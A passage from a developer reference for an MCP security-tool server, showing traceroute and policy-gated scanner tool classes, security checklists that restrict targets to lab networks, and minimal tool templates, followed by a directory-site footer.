a value") return safe def parse_output(self, output: str) -> Dict[str, Any]: """Parse traceroute output.""" hops = [] for line in output.split('\n'): match = self._HOP_PATTERN.match(line) if match: hop_num, hop_data = match.groups() hops.append({ "number": int(hop_num), "data": hop_data.strip() }) return { "hops": hops, "hop_count": len(hops), "completed": len(hops) > 0 } async def run(self, inp: ToolInput, timeout_sec: Optional[float] = None) -> ToolOutput: """Execute with output parsing.""" result = await super().run(inp, timeout_sec) # Add parsed data if result.returncode == 0 and result.stdout: try: parsed = self.parse_output(result.stdout) result.ensure_metadata() result.metadata["parsed"] = parsed log.info("traceroute.parsed target=%s hops=%d", inp.target, parsed["hop_count"]) except Exception as e: log.warning("traceroute.parse_failed error=%s", str(e)) return result ``` ### 12.3 Advanced Tool (Scanner with Policy) ```python """ Advanced scanner tool with policy controls and templates. Use this as reference for complex tools. """ import logging from typing import ClassVar, Optional, Sequence, Dict, Any, Tuple from enum import Enum from mcp_server.base_tool import MCPBaseTool, ToolInput, ToolOutput from mcp_server.config import get_config log = logging.getLogger(__name__) class ScanMode(Enum): """Scan modes.""" QUICK = "quick" NORMAL = "normal" DEEP = "deep" class ScannerTool(MCPBaseTool): """ Advanced network scanner with policy controls. Security Model: - Base flags always allowed - Intrusive flags gated by policy - Script execution controlled """ command_name: ClassVar[str] = "scanner" BASE_ALLOWED_FLAGS: Tuple[str, ...] = ( "-v", "-q", "--normal-scan" ) concurrency: ClassVar[int] = 1 default_timeout_sec: ClassVar[float] = 600.0 def __init__(self): super().__init__() self.config = get_config() self.allow_intrusive = False self._apply_config() def _apply_config(self): """Apply policy configuration.""" try: if hasattr(self.config, 'security'): self.allow_intrusive = bool( getattr(self.config.security, 'allow_intrusive', False) ) log.info("policy.configured intrusive=%s", self.allow_intrusive) except Exception as e: log.error("config.failed error=%s", str(e)) self.allow_intrusive = False @property def allowed_flags(self) -> List[str]: """Dynamic flags based on policy.""" flags = list(self.BASE_ALLOWED_FLAGS) if self.allow_intrusive: flags.extend(["--deep-scan", "--aggressive"]) log.debug("policy.intrusive_flags_added") return flags def _get_template_args(self, mode: ScanMode) -> str: """Get arguments for scan mode.""" templates = { ScanMode.QUICK: "-v --normal-scan", ScanMode.NORMAL: "-v", ScanMode.DEEP: "--deep-scan -v" if self.allow_intrusive else "-v", } return templates[mode] async def run_with_template( self, target: str, mode: ScanMode = ScanMode.NORMAL, timeout_sec: Optional[float] = None ) -> ToolOutput: """Execute with template.""" args = self._get_template_args(mode) inp = ToolInput( target=target, extra_args=args, timeout_sec=timeout_sec ) log.info("template.scan mode=%s target=%s intrusive=%s", mode.value, target, self.allow_intrusive) return await self.run(inp, timeout_sec) def get_tool_info(self) -> Dict[str, Any]: """Extended tool information.""" info = super().get_tool_info() info.update({ "policy": { "intrusive_allowed": self.allow_intrusive, "base_flags": list(self.BASE_ALLOWED_FLAGS), "total_flags": len(self.allowed_flags), }, "templates": [mode.value for mode in ScanMode], }) return info ``` --- ## Appendix A: Quick Reference Checklist ### New Tool Checklist ``` □ Created file in mcp_server/tools/ □ Imported MCPBaseTool □ Defined command_name □ Defined allowed_flags (or set to None for no args) □ Set appropriate concurrency □ Set appropriate timeout □ Added docstring □ Tested command exists (shutil.which) □ Validated with private IP target □ Validated with .lab.internal hostname □ Tested invalid flag rejection □ Tested shell metacharacter blocking □ Added to version control □ Documented in README ``` ### Security Checklist ``` □ All flags whitelisted □ Non-flag tokens blocked □ Shell metacharacters blocked □ Target restricted to private/lab □ Timeout set appropriately □ Resource limits considered □ Sensitive data not logged □ Error messages not exposing secrets □ Configuration clamped to safe ranges □ Policy controls for dangerous operations ``` --- ## Appendix B: Common Patterns Quick Copy ### Minimal Tool Template ```python from mcp_server.base_tool import MCPBaseTool class MyTool(MCPBaseTool): command_name = "mycommand" allowed_flags = ["-v", "-q"] concurrency = 2 default_timeout_sec = 60.0 ``` ### Tool with Configuration ```python from mcp_server.base_tool import MCPBaseTool from mcp_server.config import get_config class MyTool(MCPBaseTool): command_name = "mycommand" allowed_flags = ["-v"] def __init__(self): super().__init__() self.config = get_config() self._apply_config() def _apply_config(self): if hasattr(self.config, 'tool'): self.default_timeout_sec = max( 60.0, min(3600.0, float(getattr(self.config.tool, 'default_timeout', 300.0))) ) ``` ### Tool with Custom Validation ```python async def _execute_tool(self, inp: ToolInput, timeout_sec: Optional[float] = None) -> ToolOutput: error = self._custom_validation(inp) if error: return error return await super()._execute_tool(inp, timeout_sec) def _custom_validation(self, inp: ToolInput) -> Optional[ToolOutput]: if self._is_invalid(inp): error_context = ErrorContext( error_type=ToolErrorType.VALIDATION_ERROR, message="Validation failed", recovery_suggestion="Fix your input", timestamp=datetime.now(), tool_name=self.tool_name, target=inp.target ) return self._create_error_output(error_context, inp.correlation_id or "") return None ``` --- This document is maintained as the definitive reference for MCP Server tool development. For architecture details, see `MCP_Server_Architecture_Design_Document.md`.

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/nordeim/Security-MCP-Server-v3'

If you have feedback or need assistance with the MCP directory API, please join our Discord server